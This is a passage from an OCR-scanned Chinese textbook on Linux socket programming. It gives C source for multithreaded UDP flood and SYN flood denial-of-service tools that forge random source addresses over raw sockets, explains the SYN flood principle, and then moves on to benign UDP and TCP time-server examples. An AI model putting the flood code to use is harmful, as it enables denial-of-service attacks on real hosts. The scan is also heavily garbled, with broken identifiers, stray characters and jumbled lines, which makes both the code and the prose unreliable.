可 以 直接 发 向 目标 机 。 与 13.8.2 节 中 一 样 ， 本 程序 使 用 了 多 线程 。 
(1) CRC16 校 验 计算 的 代码 如 下 : 


/*CRC16 校 验 */ 
static unsigned short DoS cksum (unsigned short *data, int length) 
{ 

register int left = length; 

register unsigned short *word = data; 

register int sum = 0; 
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unsigned short ret = 0; 
/* 计 算 偶数 字 节 */ 

while (left > 1) 

{ 


sum += *Wword++; 
left -= 2; 
上 
/# 如 果 为 奇数 , 将 最 后 一 个 字 节 单独 计算 
* ”剩余 的 一 个 字 节 为 高 字 节 构建 一 个 short 类 型 变量 值 


sa 

if (left == 1) 

lL 
*(unsigned char *) (&ret) = *(unsigned char *) word; 
sum += ret; 

} 

/* 折 过 */ 

sum = (sum >> 16) + (sum & Oxffff); 

sum += (sum >> 16); 

/* 取 反 */ 


ret = ~sum; 
return (ret); 


} 
(2) UDP 发 送 的 核心 处 理 函 数 代码 如 下 ， 与 ICMP 相 比 ， 主 要 多 了 两 个 端口 地 址 。 


static void DoS udp () 

i 

#define K 1204 

#define DATUML (3*K) /*UDP 数据 部 分 长 度 */ 


/* 数 据 总 长 度 */ 
int tot len = sizeof (struct ip) + sizeof (struct udphdr) + DATUML; 
/* 发 送 目的 地 址 */ 


struct sockaddr in to; 


/*DOS 结构 ,分 为 IP 头 部 、UDP 头 部 、UDP 数据 部 分 */ 
struct dosseg t 
{ 
struct ip iph; 
struct udphdr udph; 
unsigned char data[65535]; 
}dosseg; 
/*IP 的 版 本 , IPv4*/ 
dosseg.iph->ip Vv = 4; 
/*IP 头 部 长 度 , 字 节 数 */ 
dosseg.iph->ip hl = 5; 


/* 服 务 类 型 */ 

dosseg.iph->ip tos = 0; 

/*IP 报 文 的 总 长 度 */ 

dosseg.iph->ip len = htons (tot len); 
/* 标 识 , 设置 为 PID*/ 

dosseg.iph->ip id = htons (getpid ()); 
/* 段 的 便宜 地 址 */ 

dosseg.iph->ip off = 0; 

/*TTL*/ 

dosseg.iph->ip ttl = myrandom (200, 255); »; 
/* 协 议 类 型 */ 
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dosseg.iph->ip p = PROTO UDP; 


/* 校 验 和 , 先 填写 为 0*/ 

dosseg.iph->ip sum = 0; 

/* 发 送 的 源 地 址 */ 

dosseg.iph->ip _ src = (unsigned long) myrandom (0, 65535); 
/* 发 送 目 标 地 址 */ 


dosseg.iph->ip dst 
dosseg.iph->ip_sum 
(dosseg.iph)); 


dest; 
DoS cksum ((u16 *+) & dosseg.iph, sizeof 


#ifdef _ FAVOR BSD 


/*UDP 源 端 口 */ 

dosseg.udph.uh sport = (unsigned long) myrandom (0, 65535); ; 
/*UDP 目的 端口 */ 

dosseg.udph.uh dport = dest port; 

/*UDP 数据 长 度 */ 

dosseg.udph.uh ulen = htons(sizeof (dosseg.udph)+DATUML); 

/* 校 验 和 , 先 填 写 0*/ 

dosseg.udph.uh sum = 0; 

/* 校 验 和 */ 

dosseg.udph.uh sum = DoS cksum( (ul16*) &dosseg.udph, tot len); 


#else 


/*UDP 源 端 口 */ 
dosseg.udph.source = (unsigned long) myrandom (0, 65535); »; 
/*UDP 目的 端口 */ 

dosseg.udph.dest = dest port; 

/*UDP 数据 长 度 */ 

dosseg.udph.len = htons (sizeof (dosseg.udph) +DATUML); 

/* 校 验 和 , 先 填 写 0*/ 
dosseg.udph.check 
/* 校 验 和 */ 
dosseg.udph.check 


0; 


DoS_cksum( (ul16*) &dosseg.udph, tot len); 


#endif 


/* 填 写 发 送 目 的 地 址 部 分 */ 
to.sin family = AF_INET; 
to.sin addr.s addr = dest; 
to.sin port = htons (0); 

/* 发 送 数 据 */ 


sendto (rawsock, &dosseg, tot len, 0, (struct sockaddr *) &to, 


(struct sockaddr)); 


} 
《3 


线程 函数 为 DoS_fun0， 代 码 如 下 ， 轮 询 调用 函数 DoS_udp()。 


static void 
DoS_fun (unsigned long ip) 


上 


while(alive) 
{ 

DoS_udp () ; 
站 


主 函数 处 理 过 程 与 ICMP 一 致 ， 用 多 线程 来 处 理发 送 。 


main(int argc, char *argv[]) 


sizeof 
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struct hostent *+ host = NULL; 
struct protoent *protocol = NULL; 
char protoname[]= "icmp"; 

int i = 0; 

pthread t pthread[MAXCHILD]; 

int err = -1; 


alive = 1; 

/* 截 取信 号 Ctrl+c*/ 

signal (SIGINT, DoS sig); 
/+ 参数 数 量 是 否 正 确 */ 
if(argc < 3) 

{ 


return -1; 


1 
/* 获 取 协 议 类 型 TCMP*/ 
Protocol = getprotobyname (protoname); 
if (protocol == NULL) 
ly 
perror ("getprotobyname ()") 
return -1; 
} 
PROTO UDP = protocol->p proto; 
/* 输 入 的 目的 地 址 为 字符 串 IP 地 址 */ 
dest = inet addr(argv[1]); 
if(dest == INADDR_ NONE) 
{ 
/* 为 DNS 地 址 */ 
host = gethostbyname (argv[1]) 7 
if(host == NULL) 
{ 
perror ("gethostbyname"); 
return -1; 


’ 
/* 将 地 址 复制 到 dest 中 */ 
memcpy ( (char *) &dest, host->h addr.s addr, host->h length); 


| 
/* 目 的 端口 */ 
dest port = atoi(argv[2]); 
/* 建 立 原始 socket*/ 
rawsock = socket (AF _INET, SOCK_ RAW, RAW); 
if (rawsock < 0) 
rawsock = socket (AF INET, SOCK RAW, PROTO UDP); 
/* 设 置 IP 选项 */ 
setsockopt (rawsock, SOL IP, IP HDRINCL, "1", sizeof ("1")); 
/* 建 立 多 个 线程 协同 工作 */ 
for(i=0; i<MAXCHILD; i++) 
{ 


err = pthread create(g&pthread[i], NULL, DoS fun, NULL); 


} 
/* 等 待 线程 结束 */ 
for (i=0; i<MAXCHILD; i++) 
{ 
pthread join(pthread[i], NULL); 
1 


close (rawsock); 
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return 0; 


13.10 ”SYN 洪水 攻击 


SYN 洪水 攻击 也 称 为 拒绝 服务 攻击 ， 它 利用 了 TCP 的 三 次 握手 ， 利 用 大 量 的 TCP 连 
接 请 求 造成 目标 机 的 资源 耗 尽 ， 而 不 能 提供 正常 的 服务 或 者 服务 质量 下 降 。 


13.10.1 SYN 洪水 攻击 的 原理 


一 般 情况 下 的 TCP 连接 函数 connect()， 经 历 了 三 次 握手 ， 如 果 从 人 P 层 协议 来 看 ， 客 
户 端 先 发 送 SYN 请 求 ， 服 务 器 对 客户 端的 SYN 进行 响应 ， 而 客户 端 对 服务 器 的 响应 再 次 
进行 确认 后 才 建 立 了 一 个 TCP 的 连接 。 在 服务 器 发 送 响应 后 ， 要 等 待 一 段 时 间 才 能 获得 客 
户 端的 确认 ， 即 第 二 次 和 第 三 次 握手 之 间 有 一 个 超时 时 间 ，SYN 攻击 就 利用 了 这 个 时 机 。 

如 图 13.19 所 示 为 TCP 的 三 次 握手 过 程 。 有 主机 A 和 主机 B， 主 机 A 需要 TCP 连接 
主机 B。 在 建立 连接 之 前 ， 主 机 A 发 送 一 个 ICMP 的 SYN 数据 包 给 主机 B， 主 机 B 在 接 
收 到 主机 A 的 报 文 后， 发 送 给 主机 A 一 个 回应 ， 主 机 A 接收 到 主机 B 的 响应 后 ， 又 给 主 
机 B 一 个 报 文 , 表示 接收 到 了 主机 B 的 连接 请 求 ， 主机 B 正确 地 接收 到 主机 A 的 报 文 后 ， 
TCP 连接 才 正 式 连接 。 


主机 A SYN——— 主机 B 第 一 次 握手 
主机 A 一 -一 SYN/ACK- 主机 B 第 二 次 握手 
主机 A ACK: 主机 B 第 = 站 


图 13.19 TCP 连接 的 三 次 握手 


SYN 攻击 利用 第 二 次 握手 的 手段 如 下 : 

口 主机 A 发 送 ICMP 的 SYN 请 求 给 主机 B， 主 机 A 发 送 的 报 文 的 源 地 址 IP 是 一 个 
伪造 的 全。 主机 B 的 第 二 次 握手 之 后 要 等 待 一 段 时 间 ， 接 收 主机 A 的 确认 包 ， 在 
超时 时 间 内 此 资源 一 直 在 占用 。 如 果 主 机 B 的 处 理 TCP 三 次 握手 的 资源 不 能 满足 
处 理 主机 A 的 SYN 请 求 数量 ， 则 主机 B 的 可 用 资源 就 会 慢 慢 减少 ， 直 到 耗 尽 。 

口 主机 A 发 送 的 报 文 是 原始 报 文 ， 发 送 报 文 的 速度 可 以 达到 很 高 ， 因 此 有 足够 的 资 
源 能 对 目标 机 造成 影响 。 

13.10.2 ”SYN 洪水 攻击 的 例子 

上 面 对 TCP 的 SYN 进行 攻击 的 原理 进行 了 简单 的 介绍 , 下 面 将 分 析 一 下 SYN 攻击 的 

核心 代码 DoS_syn() 函 数 。 


(1) 先 建立 一 个 结构 dosseg， 这 样 可 以 方便 、 快 速 地 处 理 。 包 含 结构 struct ip 的 变量 
iph 和 tcp 头 部 的 结构 structtcphdr 变量 tcph 及 数据 部 分 data。 
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static void DoS_syn (void) 


{ 
/* 发 送 目的 地 址 */ 


struct sockaddr in to; 


/*DOS 结构 ,分 为 IP 头 部 、UDP 头 部 、UDP 数据 部 分 */ 
struct dosseg 七 
{ 
struct ip iph; 
struct tcphdr tcph; 
unsigned char data[8192]; 
}dosseg; 


(2) 填写 IP 头 部 数据 部 分 ， 包含 版 本 、 头 部 长 度 、 服 务 类 型 、 总 长 度 、 偏 移 量 、 生 存 
时 间 等 ， 儿 个 变量 均 使 用 了 一 个 随机 数 函数 进行 了 动态 生成 。 


/*IP 的 版 本 , IPv4*/ 

dosseg.iph->ip v = 4; 

/*IP 头 部 长 度 , 字 节 数 */ 

dosseg.iph->ip hl = 5; 

/* 服 务 类 型 */ 

dosseg.iph->ip tos = 0; 

/*IP 报 文 的 总 长 度 */ 

dosseg.iph->ip len = htons (sizeof(struct ip)+sizeof(struct tcphdr)); 
/* 标 识 , 设置 为 PID*/ 

dosseg.iph->ip_id = htons (getpid ()); 
/* 段 的 便宜 地 址 */ 

dosseg.iph->ip off = 0; 

/* 最 大 生存 时 间 */ 

dosseg.iph->ip ttl = myrandom (128, 255); 
/* 协 议 类 型 */ 

dosseg.iph->ip p = PROTO_TCP; 

/* 校 验 和 , 先 填写 为 0*/ 

dosseg.iph->ip_sum = 0; 

/* 发 送 的 源 地 址 */ 

dosseg.iph->ip_src = (unsigned long) myrandom(0, 65535); 
/* 发 送 目 标 地 址 */ 

dosseg.iph->ip dst = dest; 


(3) 填写 完 IP 头 部 后 需要 填写 TCP 的 头 部 数据 ， 包 含 序列 号 、 确 认 号 、 滑 动 窗口 大 
小 等 ， 代 码 中 设置 了 SYN 域 的 有 效 dosseg.tcph.syn=1， 这 样 ， 目 标 主 机 认为 是 一 个 TCP 
连接 请 求 ， 会 发 送 响 应 ， 并 等 竺 超时。 发 送 源 地 址 是 随机 生成 的 ， 然 后 计算 校 验 和 。 


dosseg.tcph.seq = htonl ((unsigned long) myrandom(0, 65535)); 
dosseg.tcph.ack seq = htons (myrandom(0, 65535)); 
dosseg.tcph.syn = 1; 
dosseg.tcph.urg = 1; 
dosseg.tcph.window = htons (myrandom(0, 65535)); 
dosseg.tcph.check = 0; 
dosseg.tcph.urg ptr = htons (myrandom(0, 65535)); 
dosseg.tcph.check = DoS cksum ((ul6 *) buffer, 

(sizeof (struct ip) + sizeof (struct tcphdr) + 1) & ~1); 
dosseg.iph.ip sum = DoS cksum ((u16 *#) buffer, 

(4 * dosseg.iph.ip hl + sizeof (struct tcphdr) + 1) & ~1); 
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(4) 最 后 填写 发 送 目 的 地 址 并 发 送出 去 。 


/* 填 写 发 送 目 的 地 址 部 分 */ 
to.sin family = RE INET; 
to.sin addr.s addr = dest; 
to.sin Port = htons(0); 


/* 发 送 数 据 */ 

sendto (rawsock, 
&dosseg, 
4 * dosseg.iph.ip hl + sizeof (struct tcphdr) ， 
0， 


(struct sockaddr *) &to, 
sizeof (struct sockaddr)); 


} 
(5) 头 文件 、 一 些 函 数 定义 和 一 些 宏 如 下 : 


#include <stdio.h> 

#include <ctype.h> 

#include <unistd.h> 

#include <fcntl.h> 

#include <signal.h> 

#include <sys/time.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <netdb.h> 

#include <errno.h> 

#include <stdlib.h> 

#include <time.h> 

/* 最 多 线程 数 */ 

#define MAXCHILD 128 

/* 目 的 IP 地 址 */ 

static unsigned long dest = 0; 
static unsigned short dest port = 0; 
/*ICMP 协议 的 值 */ 

static int PROTO_TCP = -=1; 

/* 程 序 活动 标志 */ 


static alive = -1; 


(6) 以 下 是 主 函数 部 分 , 先 声 明 一 些 变 量 , pthread 用 户 保 存 线程 的 ID,，signal(SIGINT, 
DoS_sig) 用 于 截取 信号 SIGINT。 


int main(int argc, char *argv[]) 

‘ 
struct hostent * host = NULL; 
struct protoent *protocol = NULL; 
char protoname[]= "icmp"; 
an 0 
pthread t pthread [MAXCHILD]; 
int err = -1; 


alive = 1; 

/* 截 取信 号 Ctrl+C*/ 

signal (SIGINT, DoS sig); 
/* 参 数 数量 是 否 正确 */ 
EEC < 33) 

{ 


return -1; 
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} 
(7) 获取 ICMP 的 类 型 。 
/* 获 取 协 议 类 型 TCMP*/ 


protocol = getprotobyname (Protoname) 
if (Protocol == NULL) 
下 
perror ("getprotobyname () "); 
return -1; 


1 
PROTO_TCP = protocol->p_ proto; 


(8) 判断 输入 的 目的 耳 地 址 和 目的 端口 。 


/* 输 入 的 目的 地 址 为 字符 串 IP 地 址 */ 
dest = inet addr (argv[1]); 
if(dest == INADDR NONE) 
| 
/* 为 DNS 地 址 */ 
host = gethostbyname (argv[1]); 
if(host == NULL) 
{ 
perror ("gethostbyname"); 
return -1; 
/* 将 地 址 复制 到 qest 中 */ 
memcpy( (char *)&dest, host->h addr.s addr, host->h length); 
} 
/* 目 的 端口 */ 


dest port = atoi (argv[2]); 
(9) 设置 原始 套 接 字 ， 并 设置 选项 为 IP 选项 。 


/* 建 立 原始 socket*/ 
rawsock = socket (AF_INET, SOCK RAW, RAW); 
if (rawsock < 0) 
rawsock = socket (AF_INET, SOCK RAW, PROTO TCP); 


/* 设 置 IP 选项 */ 


setsockopt (rawsock, SOL IP, IP_ HDRINCL, "1", sizeof ("1")); 


(10) 建立 多 个 线程 进行 协同 处 理 ， 然 后 等 待 用 户 发 送 的 SIGINT 信号 ， 所 有 线程 退出 
后 结束 程序 。 
/* 建 立 多 个 线程 协同 工作 */ 


for (i=0; i<MAXCHILD; i++) 


‘ 
err = pthread create(&pthread[i], NULL, DoS_ fun, NULL); 


} 
/* 等 待 线程 结束 */ 
for (i=0; i<MAXCHILD; i++) 
{ 
pthread join(pthread[i], NULL); 
} 


close (rawsock); 


return 0; 
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13.11 站 结 


与 通常 的 TCP 和 UDP 相对 应 ， 还 存在 一 种 原始 套 接 字 的 概念 ， 主 要 用 于 对 底层 协议 
的 控制 和 自 定义 协议 的 编写 。 原始 套 接 字 进行 创建 的 时 候 使 用 socket() 函 数 , 第 二 个 参数 使 
] SOCK_RAW 。 本 章 介 绍 了 一 个 ping 的 例子 ,使 用 了 ICMP 协议 的 类 型 8， 代码 0， 设置 
ICMP 头 部 。 本 章 还 对 IP 层 头 部 、TCP 头 部 、UDP 头 部 、ICMP 头 部 进行 了 简单 的 介绍 ， 
并 在 实际 的 程序 中 进行 了 使 用 。 

最 后 介绍 了 网 络 安全 中 经 常 碰 到 的 洪水 攻击 ， 主 要 包括 ICMP、UDP 和 TCP 的 SYN 
攻击 。 洪 水 攻击 是 指 对 目标 机 发 送 大 量 的 数据 造成 目标 机 运行 缓慢 或 者 不 能 正常 响应 。 洪 
水 攻击 采用 的 手段 有 直接 攻击 、 伪 装 IP 头 部 、 反 射 攻击 和 拒绝 服务 的 SYN 攻击。 反射 攻 
击 是 使 用 了 一 组 服务 器 的 ICMP 回 显 进行 的 ， 而 SYN 攻击 则 利用 了 TCP 的 三 次 握手 中 的 
第 二 次 握手 和 第 三 次 握手 之 间 的 超时 时 间 ， 使 得 目标 机 的 资源 耗 尽 而 不 能 正常 响应 服务 。 
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在 之 前 儿童 的 内 容 中 , 对 Linux 环境 下 的 套 接 字 编程 进行 了 介绍 。 要 进行 套 接 字 编程 ， 
选择 合适 的 模型 十 分 重要 。 本 章 主要 介绍 套 接 字 编程 的 服务 器 模型 的 类 型 ， 包 括 循环 服务 
器 模型 、 并 发 服务 器 模型 、IO 复 用 服务 器 模型 等 网 络 程序 的 模型 设计 ， 对 其 中 的 主要 特点 


进行 详细 地 介绍 。 主 要 包括 以 下 内 容 : 


口 循环 服务 器 ， 使 用 循环 的 方法 逐个 处 理 客户 端的 连接 ， 处 理 完 一 个 连接 后 再 处 理 


另 一 个 连接 ; 


口 并 发 服务 器 的 简单 模型 ， 使 用 进程 处 理 客户 端的 连接 和 请 求 ; 
口 并 发 服务 器 的 TCP 的 分 类 ， 介 绍 了 使 用 进程 池 或 者 线程 池 进 行 客户 端 请 求 处 理 的 


框架 和 方法 ， 并 按照 accept 的 处 理 情况 进行 了 不 同 状态 的 划分 ; 


口 并 发 服务 器 模型 中 使 用 IO 复 用 , 使 用 同一 处 理 模块 监视 多 个 客户 端的 连接 并 进行 


处 理 。 


14.1 循环 服务 器 


循环 服务 器 指 的 是 对 于 客户 端的 请 求 和 连接 ， 服 务 
器 在 处 理 完 毕 一 个 之 后 再 处 理 另 一 个 ， 即 串 行 处 理 客户 
端的 请 求 。 循 环 服 务 器 又 叫 迭 代 服 务 器 。 循 环 服务 器 经 
常用 于 UDP 服务 程序 ， 例 如 时 间 服 务 程 序 、DHCP 服务 
器 等 s 
14.1.1 UDP 循环 服务 器 


UDP 协议 的 循环 服务 器 如 图 14.1 所 示 ， 服 务 器 在 
recv() 函 数 和 处 理 数 据 这 两 种 业务 之 间 轮 询 处 理 。 


1. 循环 服务 器 的 服务 器 端 


循环 服务 器 的 基本 程序 架构 比较 简单 ， 参 见 如 下 代 
码 实例 。 例 子 中 客户 端 发 送 请 求 ， 内 容 为 字符 串 TIME， 
服务 器 端 判断 客户 端 发 送 的 字符 串 是 否 正确 再 进行 响 
应 。 如 果 客 户 端 的 请 求 正确 ， 服 务 器 发 送 主 机 的 本 地 时 
间 ， 将 一 个 字符 串 形式 的 时 间 反 馈 给 客户 端 。 服 务 器 端 
代码 如 下 : 


01 #include <sys/types.h> 


图 14.1 循环 服务 器 示意 图 
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02 #include <sys/socket.h> 

03 #include <netinet/in.h> 

04 #include <time.h> 

05 #include <string.h> 

06 #include <unistd.h> 

07 #include <stdio.h> 

08 #define BUFFLEN 1024 

09 #define SERVER PORT 8888 

10 int main(int argc char *argv[]) 


和 让 

12 In /* 服 务 器 套 接 字 文件 描述 符 */ 
13 struct sockaddr in local, to; /* 本 地 地 址 */ 

14 time t now; /* 时 间 */ 

15 char buff[BUFFLEN]; /* 收 发 数据 缓冲 区 */ 
16 int n= 0; 

hy socklen t len = sizeof (to); 

18 

19 s = socket(AF INET, SOCK DGRAM, 0); /* 建 立 UDP 套 接 字 */ 
20 

21 /* 初 始 化 地 址 */ 

全 2 memset (&local, 0, sizeof (local)); /* 清 零 */ 

23 local.sin family = AF_ INET; /*AF_INET 协议 族 */ 
24 local.sin addr.s_addr = htonl (INADDR_ANY) ; /* 任 意 本 地 地 址 */ 
25 local.sin port = htons (SERVER PORT); /* 服 务 器 端口 */ 

26 


27 /* 将 套 接 字 文件 描述 符 绑 定 到 本 地 地 址 和 端口 */ 


28 bind(s, (struct sockaddr*) glocal, sizeof (local)); 

29 /* 主 处 理 过 程 */ 

30 while (1) 

31 { 

32 memset (buff, 0, BUFFLEN); /* 清 零 */ 

3 n= recvfrom(s, buff, BUFFLEN,0, (struct sockaddr*) gto, &len); 


34 /* 接 收发 送 方 数据 */ 

35 if(n > 0 && !strncmp (buff，"TIME"，4)) /* 判 断 是 否 合法 接收 数据 */ 
36 { 

37 memset (buff, 0, BUFFLEN); /* 清 零 */ 

38 now = time (NULL); /* 当 前 时 间 */ 

39 sprintf (buff, "$24s\r\n",ctime (&now) ) ; /* 将 时 间 复 制 入 缓冲 区 */ 


42 } 
43 } 
44 close(s) 


sendto(s, buff, strlen (buff),0, (struct sockaddr*) &to, len); 
/* 发 送 数 据 */ 


了 


46 return 0; 


EA 


服务 器 端的 程序 在 建立 套 接 字 描述 符 之 后 ， 初 始 化 网 络 地 址 ， 设 置 协议 族 、 本 地 IP 
地 址 、 本 地 的 服务 器 端口 〈 为 8888)， 然 后 将 地 址 绑 定 到 套 接 字 描述 符 上 。 在 主 处 理 过 程 


TIME 关键 字 的 程序 ， 
后 关闭 套 接 字 描述 。 


使 用 这 个 缓冲 区 接收 发 送 方 发 送 的 数据 ， 如 果 发 送 的 数据 为 包含 
先 获 取 本 地 的 时 间 ， 将 时 间 复 制 到 缓冲 区 后 向 请 求 方 发 送 数据 。 最 


在 上 述 的 程序 中 使 用 while 作为 主要 的 数据 处 理 部 分 ， 在 这 个 部 分 服务 器 端 可 以 将 各 
个 客户 端 发 送 来 的 数据 进行 循环 处 理 ， 每 次 仅仅 处 理 一 个 客户 端的 数据 请 求 操作 ， 在 处 理 
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完 一 个 客户 端 请 求 之 后 ， 可 以 再 处 理 接 下 来 的 另 一 个 请 求 。 通 常 这 种 操作 都 是 在 一 个 循环 
程序 中 进行 处 理 ， 例 如 本 例 中 在 while 中 进行 处 理 ， 所 以 叫做 循环 服务 器 。 


2. 循环 服务 器 的 客户 端 
客户 端 代 码 如 下 ， 本 章 中 其 他 部 分 的 客户 端 都 与 本 客户 端 一 致 。 


01 #include <sys/types.h> 

02 #include <sys/socket.h> 

03 #include <netinet/in.h> 

04 #include <time.h> 

05 #include <string.h> 

06 #include <unistd.h> 

07 #include <stdio.h> 

08 #define BUFFLEN 1024 

09 #define SERVER PORT 8888 

10 int main(int argc, char *argv[]) 

Ll 

Te Tnt es /* 服 务 器 套 接 字 文件 描述 符 */ 
人 struct sockaddr in server; /* 本 地 地 址 */ 

14 char buff[BUFFLEN]; /* 收 发 数据 缓冲 区 */ 

15 int n = 0; /* 接 收 字符 串 长 度 */ 

16 socklen t len = 0; /* 地 址 长 度 */ 

下 地 

18 s = socket(AF INET, SOCK DGRAM, 0); /* 建 立 UDP 套 接 字 */ 

19 

20 /* 初 始 化 地 址 初始 化 */ 

21 memset (&server, 0, sizeof (server)); /* 清 零 */ 

2 server.sin family = RE INET; /*AF_INET 协议 族 */ 

23 server.sin addr.s addr = hton] (INADDR ANY); /* 任 意 本 地 地 址 */ 
24 server.sin port = htons (SERVER PORT); /* 服 务 器 端口 */ 
2 

26 memset (buff, 0, BUFFLEN); /* 清 零 */ 

2 strcpy (buff, "TIME") ; /x* 复 制 发 送 字符 串 */ 

28 /* 发 送 数 据 */ 

29 sendto(s, buff, strlen(buff), 0, (struct sockaddr*) gserver, sizeof 
(server)); 

30 memset (buff, 0, BUFFLEN); /* 清 零 */ 

3 /* 接 收 数据 */ 

上 len = sizeof (server); 

be) n= recvfrom(s, buff, BUFFLEN, 0, (struct sockaddr*) gserver, &len); 
34 /* 打 印 消息 */ 

35 if(n >0){ 

36 printf ("TIME:%s",buff); 

37 } 

38 close(s); 

39 

40 return 0; 

eh 


客户 端的 程序 先 建立 一 个 UDP 类 型 的 套 接 字 ， 然 后 设置 请 求 服务 器 的 地 址 和 端口 网 
络 地 址 结构 ， 并 将 TIME 字符 串 作 为 请 求 的 数据 发 送 到 服务 器 端 ， 请 求 服务 器 的 时 间 。 然 
后 等 待 服务 器 端的 响应 ， 接 收服 务 器 端 发 送 过 来 的 时 间 数 据 ， 并 将 信息 打印 出 来 。 最 后 关 
闭 套 接 字 连接 ， 退 出 程序 。 

编译 并 运行 后 ， 客 户 端的 结果 为 : 
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TIME:Thu Jun 6 20:24:00 2013 


14.1.2 TCP 循环 服务 器 


相 比 较 UDP 协议 的 循环 服务 器 ，TCP 协议 的 循环 服务 器 的 主 处 理 过 程 中 多 了 一 个 
accept 的 过 程 ， 服 务 器 在 此 处 等 待 客户 端的 连接 ， 由 于 
accept0) 函 数 为 阻塞 函数 ， 所 以 通常 情况 下 ， 服 务 器 会 在 es 
此 处 进行 等 待 。 对 accept() 函 数 的 不 同 处 理 是 区 别 各 种 服 


务 器 类 型 的 一 个 重要 依据 。 ， 
1. TCP 循环 服务 器 介绍 
TCP 协议 的 循环 服务 器 处 理 过 程 参见 图 14.2。TCP bindO 
服务 器 使 用 socket0 函 数 建立 套 接 字 文件 描述 符 后 ， 对 地 
址 和 套 接 字 文件 描述 符 使 用 bind0) 函 数 进行 绑 定 ， 使 用 ——— 
listen() 函 数 设 定 侦 听 的 队列 长 度 ， 然后 进入 循环 服务 器 的 listen() 
主 处 理 过 程 。 1 
TCP 协议 的 循环 服务 器 的 主 处 理 过 程 主要 有 accept() 
函数 、recv() 函 数 和 数据 处 理 过 程 组 成 。 当 客户 端的 连接 EY 
connect() 到 来 时 ，accept(0) 返 回 客户 端的 主要 连接 信息 ， 此 
时 服务 器 可 以 进行 数据 的 接收 , 或 者 直接 发 送 数据 给 客户 of 
端 。 当 需要 接收 客户 端的 数据 的 时 候 ， 需 要 对 数据 进行 处 
理 ， 然 后 判定 下 一 步 服 务 器 的 处 理 方法 和 响应 数据 。 — 
本 例 中 的 业务 与 UDP 循环 服务 器 的 业务 是 相同 的 , 服 处 理 数据 
务 器 等 待 客户 端的 连接 ， 接 收 客户 端 发 送 的 数据 ， 判 定 是 
否 为 TME， 如 果 是 TIME， 则 向 客户 端 发 送 服务 器 的 主机 结束 


01 01 01 本 地 时 间 , 用 于 构成 一 个 简单 的 时 间 服 务 器 。 
2. 服务 器 端 代码 


时 间 服 务 器 的 TCP 实现 与 UDP 的 实现 类 似 , 不 过 服务 器 端的 程序 是 在 建立 TCP 套 接 
字 描 述 符 之 后 , 初始 化 网 络 地 址 , 设置 协议 族 、 本 地 IP 地 址 、 本 地 的 服务 器 端口 (为 8888)， 
然后 将 地 址 绑 定 到 套 接 字 描述 符 上 ， 并 设置 侦 听 队列 的 长 度 。 服 务 器 端的 代码 如 下 : 


01 #include <sys/types.h> 
02 #include <sys/socket.h> 
03 #include <netinet/in.h> 
04 #include <time.h> 

05 #include <string.h> 

06 #include <unistd.h> 

07 #include <stdio.h> 


图 14.2 TCP 循环 服务 器 示意 图 


08 #define BUFFLEN 1024 

09 #define SERVER PORT 8888 

10 #define BACKLOG 5 

11 int main(int argc, char *argv[]) 

i» 可 光 

3 nes se /* 服 务 器 套 接 字 文件 描述 符 */ 
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14 struct sockaddr in local, from; /* 本 地 地 址 */ 

15 time t now; /* 时 间 */ 

16 char buff[BUFFLEN]; /* 收 发 数据 缓冲 区 */ 
huyh int n = 0; 

18 socklen t len = sizeof (from); 

19 

20 /* 建 立 TCP 套 接 字 */ 

2 s_s = socket(AF INET, SOCK STREAM, 0); 

22 

es /* 初 始 化 地 址 */ 

24 memset (&local, 0, sizeof (local)); /* 清 零 */ 

25 local.sin family = AF INET; /*AF_INET 协议 族 */ 
26 local.sin addr.s_ addr = htonl (INADDR ANY); /* 任 意 本 地 地 址 */ 
加 泌 local.sin port = htons (SERVER PORT); /* 服 务 器 端口 */ 

28 

29 /* 将 套 接 字 文 件 描述 符 绑 定 到 本 地 地 址 和 端口 */ 

30 bindl(s s, (struct sockaddr*) glocal, sizeof (local)); 

31 listen(s_s, BACKLOG); /* 侦 听 */ 

人 

33 /* 主 处 理 过 程 */ 

34 while(1) 

35 { 

36 /* 接 收 客户 端 连接 */ 

37 s c= accept(s s, (struct sockaddr*) gfrom, &len); 

38 memset (buff, 0, BUFFLEN); /* 清 零 */ 

39 n = recv(s_c, buff, BUFFLEN,0); /* 接 收发 送 方 数据 */ 
40 if(n > 0 && !strncmp (buff，"TIME"，4)) /* 判 断 是 否 合 法 接收 数据 */ 
41 { 

42 memset (buff, 0, BUFFLEN); /* 清 零 */ 

43 now = time (NULL); /* 当 前 时 间 */ 

44 sprintf (buff, "$24s\r\n",ctime (&now) ) ;/* 将 时 间 复 制 入 缓冲 区 */ 
45 send(s c, buff, strlen(buff),0); /* 发 送 数 据 */ 

46 | 

47 closel(ls c); 

48 } 

49 closel(ls s); 

50 

S51 return 0; 

So 


在 主 处 理 过 程 中 ,TCP 连接 增加 了 一 个 接受 客户 端 连接 请 求 的 过 程 accept 先 将 缓冲 区 
清 零 ， 使 用 这 个 缓冲 区 接收 发 送 方 发 送 的 数据 ， 如 果 发 送 的 数据 为 包含 TIME 关键 字 的 程 
序 ， 先 获取 本 地 的 时 间 ， 将 时 间 复 制 到 缓冲 区 后 向 请 求 方 发 送 数据 。 最 后 关闭 套 接 字 描述 。 

在 上 述 的 程序 中 ， 使 用 while 作为 主要 的 数据 处 理 部 分 ， 在 这 个 部 分 服务 器 端 可 以 将 
各 个 客户 端 发 送 来 的 数据 进行 循环 处 理 ， 每 次 仅仅 处 理 一 个 客户 端的 数据 请 求 操作 ， 在 处 
理 完 一 个 客户 端 请 求 之 后 ， 可 以 再 处 理 另 一 个 请 求 。 


3. 客户 端 


客户 端的 程序 先 建立 一 个 TCP 类 型 的 套 接 字 , 然后 设置 请 求 服务 器 的 地 址 和 端口 网 络 
地 址 结构 。 客 户 端 代码 如 下 ， 本 章 中 的 客户 端 采用 相同 的 代码 ， 后 面 实例 的 客户 端 均 为 此 
代码 。 


01 #include <sys/types.h> 
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#include <sys/socket.h> 
#include <netinet/in.h> 
#include <string.h> 

#include <unistd.h> 

#include <stdio.h> 

#define BUFFLEN 1024 

#define SERVER PORT 8888 

int main(int argc, char *argv[]) 


{ 


} 


Tn /* 服 务 器 套 接 字 文件 描述 符 */ 
struct sockaddr in server; /* 本 地 地 址 */ 

char buff[BUFFLEN]; /* 收 发 数据 缓冲 区 */ 
int n = 0; /* 接 收 字符 串 长 度 */ 
/* 建 立 TCP 套 接 字 */ 

s = socket(AF INET, SOCK STREAM, 0); 

/* 初 始 化 地 址 */ 

memset (&server, 0, sizeof (server)); /* 清 零 */ 
server.sin family = AF_INET; /*AF_INET 协议 族 */ 
server.sin addr.s_addr = htonl (INADDR_ANY);/* 任 意 本 地 地 址 */ 
